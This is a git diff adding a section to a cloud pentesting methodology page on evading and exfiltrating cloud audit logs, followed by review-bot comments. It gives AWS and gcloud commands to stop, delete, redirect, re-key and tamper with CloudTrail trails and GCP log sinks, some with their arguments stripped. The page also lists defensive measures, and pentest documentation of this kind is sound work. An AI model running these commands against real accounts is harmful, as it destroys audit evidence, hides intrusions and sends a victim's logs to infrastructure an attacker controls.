diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index 9aa8f5ec6..259979c2e 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md 
@@ -420,6 +420,115 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) + +## Cloud Logging Defense Evasion & Log Exfiltration + +Cloud audit pipelines are also an **attack surface**. If an attacker gets permissions over the **log router** (CloudTrail trail / GCP sink), the **destination storage** (S3 / log bucket / Cloud Storage), or the **encryption key** (KMS / CMEK), they can blind detections, destroy evidence, poison forensic data, or get passive visibility into the victim account. + +### Preconditions to check + +High-risk permissions in this area include: + +- **AWS:** `cloudtrail:StopLogging`, `cloudtrail:DeleteTrail`, `cloudtrail:UpdateTrail`, `cloudtrail:CreateTrail`, `s3:DeleteBucket`, `s3:DeleteObject`, `s3:GetObject`, `s3:PutObject`, and KMS permissions that let an attacker swap or break the key used by CloudTrail. +- **GCP:** `logging.sinks.update`, `logging.sinks.delete`, `logging.sinks.create`, `logging.buckets.delete`, `storage.objects.get`, `storage.objects.create`, and KMS/CMEK permissions affecting log buckets. + +### Common attacker playbooks + +#### 1. Stop log delivery + +- **AWS:** stop the trail so no new events are delivered to the configured S3 bucket. +- **GCP:** disable the sink so matching entries are no longer routed. + +```bash +# AWS +aws cloudtrail stop-logging --name + +# GCP +gcloud logging sinks update --disabled +``` + +#### 2. Delete the router or the destination + +Deleting the **router** stops future delivery. Deleting the **destination** can both stop delivery and destroy historical evidence. 
+ +```bash +# AWS: delete router +aws cloudtrail delete-trail --name + +# AWS: delete historical log storage (bucket must be empty first) +aws s3 rm s3:// --recursive +aws s3api delete-bucket --bucket + +# GCP: delete router +gcloud logging sinks delete + +# GCP: delete log bucket +gcloud logging buckets delete --location= +``` + +#### 3. Break logging with an attacker-controlled encryption key + +A stealthier pattern is to **repoint logging to an attacker-controlled KMS/CMEK key** that initially works, and then revoke the logging service access to that key. + +- **AWS:** `update-trail --kms-key-id ` and then remove the `cloudtrail.amazonaws.com` access from the key policy or delete the key material. CloudTrail may surface a misleading **bucket access denied** style error even though the bucket is fine. +- **GCP:** if the log bucket already supports CMEK, update it to use an attacker-controlled key and then revoke the Cloud Logging service account decrypt permissions. Reverting may fail because the current key can no longer decrypt the bucket. + +```bash +# AWS +aws cloudtrail update-trail --name --kms-key-id + +# GCP +gcloud logging buckets update \ + --location= \ + --cmek-kms-key-name= +``` + +#### 4. Poison historical logs + +If logs are exported as **JSON objects** into object storage, an attacker with object read/write permissions can download, modify, and overwrite historical records. + +- **AWS:** modify CloudTrail objects in S3. Downstream consumers such as Athena may parse the poisoned events. +- **GCP:** when sinks export to Cloud Storage, modify the stored objects there. + +> [!TIP] +> In AWS, enable **CloudTrail log file integrity validation** to detect post-delivery tampering. This is especially important for trails created through CLI/API workflows. + +#### 5. 
Create a parallel log export for passive visibility + +Instead of running noisy discovery commands, an attacker can configure a **new** router that continuously exports victim activity to attacker-controlled infrastructure. + +```bash +# AWS +aws cloudtrail create-trail \ + --name \ + --s3-bucket-name + +# GCP +gcloud logging sinks create --log-filter="FILTER_CONDITION" +``` + +This provides passive discovery of API calls, IAM changes, new compute instances, and access to sensitive services. + +#### 6. Redirect the existing pipeline + +Modifying the current destination is usually noisier from a defender perspective than creating a second pipeline, but it can also **blind** the original monitoring stack while exfiltrating the same logs. + +```bash +# AWS +aws cloudtrail update-trail --name --s3-bucket-name + +# GCP +gcloud logging sinks update +``` + +### High-value defensive details + +- **AWS CloudTrail Event History** keeps an immutable **90-day** history for **management events**, but **data** and **network** events are not covered there. +- **AWS EventBridge** rules on trail creation, modification, deletion, and `StopLogging` can catch log-plane tampering. +- **GCP `_Required`** log bucket cannot be disabled, modified, or deleted, so it is the safest place for critical audit logs. +- **GCP locked log buckets** prevent premature deletion because retention becomes irreversible until all retained entries age out. + + ## Google ### GCP 
@@ -454,7 +563,15 @@ azure-security/ confidential-computing/luks2-header-malleability-null-cipher-abuse.md {{#endref}} -{{#include ../banners/hacktricks-training.md}} +## References +- [Unit 42 - Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility](https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/) +- [AWS CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html) +- [AWS CloudTrail log file integrity validation](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html) +- [AWS CloudTrail Event History](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html) +- [Google Cloud Logging sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2) +- [Google Cloud Logging bucket locking](https://docs.cloud.google.com/logging/docs/buckets#locking-logs-buckets) +- [Google Cloud Logging CMEK](https://docs.cloud.google.com/logging/docs/routing/managed-encryption) +{{#include ../banners/hacktricks-training.md}}
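Review bot: In the first hunk (`@@ -420,6 +420,115 @@`) every fenced command has lost its argument placeholders, e.g. `aws cloudtrail stop-logging --name`, `aws s3 rm s3:// --recursive`, `gcloud logging buckets delete --location=` and `gcloud logging sinks create --log-filter="FILTER_CONDITION"` (the last one also needs a destination argument), so readers will copy commands that fail; use literal placeholders such as `TRAIL_NAME`, `BUCKET_NAME`, `SINK_NAME` and `DESTINATION` instead of angle-bracket tokens, which the rendered page drops. Two smaller points in the same hunk: the "delete historical log storage" step should note that in a versioned bucket `aws s3 rm --recursive` leaves object versions behind and `aws s3api delete-bucket` still fails, and the log file integrity validation tip should name the flag that is off by default on the CLI, `aws cloudtrail create-trail ... --enable-log-file-validation`, since that is exactly the CLI/API case the tip warns about.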
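Review bot: In the second hunk (`@@ -454,7 +563,15 @@`) the Unit 42 article the new playbooks are drawn from appears only in the new `## References` list; link it inline at the start of the `## Cloud Logging Defense Evasion & Log Exfiltration` section so the provenance survives if the list is trimmed later, and confirm the three `docs.cloud.google.com` URLs resolve rather than redirect before merging.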